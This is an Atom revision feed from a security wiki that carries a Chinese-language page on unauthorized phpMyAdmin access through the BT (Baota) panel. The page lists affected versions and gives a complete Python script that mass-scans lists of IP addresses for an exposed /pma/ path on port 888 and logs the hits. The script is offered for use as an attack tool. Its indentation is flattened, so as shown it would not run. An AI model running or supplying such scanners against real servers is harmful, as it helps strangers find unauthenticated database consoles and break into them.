<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=%E5%AF%B6%E5%A1%94%E9%9D%A2%E6%9D%BF%E6%9C%AA%E6%8E%88%E6%AC%8A%E8%A8%AA%E5%95%8FphpMyAdmin%E6%BC%8F%E6%B4%9E%2Fzh-hant</id>
	<title>寶塔面板未授權訪問phpMyAdmin漏洞/zh-hant - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=%E5%AF%B6%E5%A1%94%E9%9D%A2%E6%9D%BF%E6%9C%AA%E6%8E%88%E6%AC%8A%E8%A8%AA%E5%95%8FphpMyAdmin%E6%BC%8F%E6%B4%9E%2Fzh-hant"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=%E5%AF%B6%E5%A1%94%E9%9D%A2%E6%9D%BF%E6%9C%AA%E6%8E%88%E6%AC%8A%E8%A8%AA%E5%95%8FphpMyAdmin%E6%BC%8F%E6%B4%9E/zh-hant&amp;action=history"/>
	<updated>2026-04-07T20:12:57Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=%E5%AF%B6%E5%A1%94%E9%9D%A2%E6%9D%BF%E6%9C%AA%E6%8E%88%E6%AC%8A%E8%A8%AA%E5%95%8FphpMyAdmin%E6%BC%8F%E6%B4%9E/zh-hant&amp;diff=6955&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;寶塔面板未授權訪問phpMyAdmin漏洞&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=%E5%AF%B6%E5%A1%94%E9%9D%A2%E6%9D%BF%E6%9C%AA%E6%8E%88%E6%AC%8A%E8%A8%AA%E5%95%8FphpMyAdmin%E6%BC%8F%E6%B4%9E/zh-hant&amp;diff=6955&amp;oldid=prev"/>
		<updated>2021-07-10T08:03:45Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;寶塔面板未授權訪問phpMyAdmin漏洞&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;&amp;lt;languages  /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==漏洞影響==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Liunx 7.4.2/windows 6.8&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==批量掃描==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#!/usr/bin/env python&lt;br /&gt;
 &lt;br /&gt;
	# -*- coding:utf-8 -*-&lt;br /&gt;
 &lt;br /&gt;
	 &lt;br /&gt;
 &lt;br /&gt;
	&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
 &lt;br /&gt;
	Author www.ti0s.com&lt;br /&gt;
 &lt;br /&gt;
	&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
 &lt;br /&gt;
	 &lt;br /&gt;
 &lt;br /&gt;
	import sys&lt;br /&gt;
 &lt;br /&gt;
	import argparse&lt;br /&gt;
 &lt;br /&gt;
	import requests&lt;br /&gt;
 &lt;br /&gt;
	from multiprocessing import Pool, Manager&lt;br /&gt;
 &lt;br /&gt;
	 &lt;br /&gt;
 &lt;br /&gt;
	print(&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
 &lt;br /&gt;
	_____ _ ____ ______ ____ ____ __ __&lt;br /&gt;
 &lt;br /&gt;
	|_ _|(_) / \ / ___/ / ___\ / \ | \ / |&lt;br /&gt;
 &lt;br /&gt;
	| | _ | / \ | \___ \ | / | / \ || \/ |&lt;br /&gt;
 &lt;br /&gt;
	| | | || \__/ | /___ &amp;gt; _ | \___ | \__/ || |\ /| |&lt;br /&gt;
 &lt;br /&gt;
	|_| |_| \____/ \/ (_) \____/ \____/ |_| \/ | |（C）&lt;br /&gt;
 &lt;br /&gt;
	&amp;quot;&amp;quot;&amp;quot;)&lt;br /&gt;
 &lt;br /&gt;
	headers = {&lt;br /&gt;
 &lt;br /&gt;
	&amp;quot;User-Agent&amp;quot;:&amp;quot;Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36&amp;quot;,&lt;br /&gt;
 &lt;br /&gt;
	&amp;quot;Accept&amp;quot;:&amp;quot;text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9&amp;quot;,&lt;br /&gt;
 &lt;br /&gt;
	}&lt;br /&gt;
 &lt;br /&gt;
	 &lt;br /&gt;
 &lt;br /&gt;
	def btPam(ip):&lt;br /&gt;
 &lt;br /&gt;
	url = &amp;quot;http://%s:888/pma/&amp;quot; % (ip)&lt;br /&gt;
 &lt;br /&gt;
	try:&lt;br /&gt;
 &lt;br /&gt;
	res = requests.get(url,headers=headers,timeout=5)&lt;br /&gt;
 &lt;br /&gt;
	if res.status_code == 200:&lt;br /&gt;
 &lt;br /&gt;
	print(&amp;quot;%s Potentially Vulnerable&amp;quot;%(ip))&lt;br /&gt;
 &lt;br /&gt;
	with open(&amp;quot;result.txt&amp;quot;,&amp;quot;w&amp;quot;) as wf:&lt;br /&gt;
 &lt;br /&gt;
	wf.write(url)&lt;br /&gt;
 &lt;br /&gt;
	finally:&lt;br /&gt;
 &lt;br /&gt;
	return&lt;br /&gt;
 &lt;br /&gt;
	 &lt;br /&gt;
 &lt;br /&gt;
	def isbt(ip, q):&lt;br /&gt;
 &lt;br /&gt;
	print('Testing {}'.format(ip))&lt;br /&gt;
 &lt;br /&gt;
	btPam(ip)&lt;br /&gt;
 &lt;br /&gt;
	q.put(ip)&lt;br /&gt;
 &lt;br /&gt;
	 &lt;br /&gt;
 &lt;br /&gt;
	def readip(flie):&lt;br /&gt;
 &lt;br /&gt;
	ips = []&lt;br /&gt;
 &lt;br /&gt;
	with open(flie,&amp;quot;r&amp;quot;) as rf:&lt;br /&gt;
 &lt;br /&gt;
	for i in rf.readlines():&lt;br /&gt;
 &lt;br /&gt;
	ip = i.lstrip('https://').lstrip('http://').rstrip(':888').rstrip(&amp;quot;/&amp;quot;).strip()&lt;br /&gt;
 &lt;br /&gt;
	ips.append(ip)&lt;br /&gt;
 &lt;br /&gt;
	return ips&lt;br /&gt;
 &lt;br /&gt;
	 &lt;br /&gt;
 &lt;br /&gt;
	def pool(ips):&lt;br /&gt;
 &lt;br /&gt;
	p = Pool(10)&lt;br /&gt;
 &lt;br /&gt;
	q = Manager().Queue()&lt;br /&gt;
 &lt;br /&gt;
	for i in ips:&lt;br /&gt;
 &lt;br /&gt;
	p.apply_async(isbt, args=(i,q,))&lt;br /&gt;
 &lt;br /&gt;
	p.close()&lt;br /&gt;
 &lt;br /&gt;
	p.join()&lt;br /&gt;
 &lt;br /&gt;
	print('请查看当前路径下文件：result.txt')&lt;br /&gt;
 &lt;br /&gt;
	 &lt;br /&gt;
 &lt;br /&gt;
	def run(filepath):&lt;br /&gt;
 &lt;br /&gt;
	ips=readip(filepath)&lt;br /&gt;
 &lt;br /&gt;
	pool(ips)&lt;br /&gt;
 &lt;br /&gt;
	 &lt;br /&gt;
 &lt;br /&gt;
	def main():&lt;br /&gt;
 &lt;br /&gt;
	parser = argparse.ArgumentParser()&lt;br /&gt;
 &lt;br /&gt;
	parser.add_argument('-l','--file',dest='file',type=str,help='批量扫描IP地址，示例：-l ip.txt ')&lt;br /&gt;
 &lt;br /&gt;
	parser.add_argument('-i','--ip',dest='ip',type=str,help='单独扫描IP地址，示例：-i 192.168.0.1')&lt;br /&gt;
 &lt;br /&gt;
	pa = parser.parse_args()&lt;br /&gt;
 &lt;br /&gt;
	if len(sys.argv[1:]) == 0:&lt;br /&gt;
 &lt;br /&gt;
	print(&amp;quot;输入 -h 参数查看使用说明&amp;quot;)&lt;br /&gt;
 &lt;br /&gt;
	exit()&lt;br /&gt;
 &lt;br /&gt;
	if pa.ip:&lt;br /&gt;
 &lt;br /&gt;
	btPam(pa.ip)&lt;br /&gt;
 &lt;br /&gt;
	if pa.file:&lt;br /&gt;
 &lt;br /&gt;
	run(pa.file)&lt;br /&gt;
 &lt;br /&gt;
	 &lt;br /&gt;
 &lt;br /&gt;
	if __name__ == '__main__':&lt;br /&gt;
 &lt;br /&gt;
	main() &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>